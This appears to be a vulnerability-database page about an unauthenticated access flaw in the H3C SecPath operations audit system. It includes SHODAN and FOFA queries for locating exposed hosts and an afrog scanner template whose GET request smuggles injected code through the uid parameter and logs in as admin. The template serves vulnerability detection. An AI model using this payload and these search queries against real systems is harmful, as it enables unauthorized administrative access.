h3csecparh-unauthorized-login: H3C Server - Unauthenticated Access

日期: 2025-09-01 | 影响软件: H3C Server | POC: 已公开

漏洞描述

H3C server was able to be accessed with no authentication requirements in place. SHODAN: http.html:"H3C-SecPath-运维审计系统" FOFA: app="H3C-SecPath-运维审计系统" && body="2018"

PoC代码[已公开]

id: h3csecparh-unauthorized-login

info:
    name: H3C Server - Unauthenticated Access
    author: Print1n(http://print1n.top)
    severity: high
    description: |
        H3C server was able to be accessed with no authentication requirements in place.
        SHODAN: http.html:"H3C-SecPath-运维审计系统"
        FOFA: app="H3C-SecPath-运维审计系统" && body="2018"
    tags: h3c,default-login,unauth
    created: 2023/06/17

rules:
    r0:
        request:
            method: GET
            path: /audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin
        expression: |
            response.status == 200 && 
            response.body.bcontains(b'错误的id') &&
            response.body.bcontains(b'审计管理员') &&
            response.body.bcontains(b'admin')
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/h3csecparh-unauthorized-login.yaml

相关漏洞推荐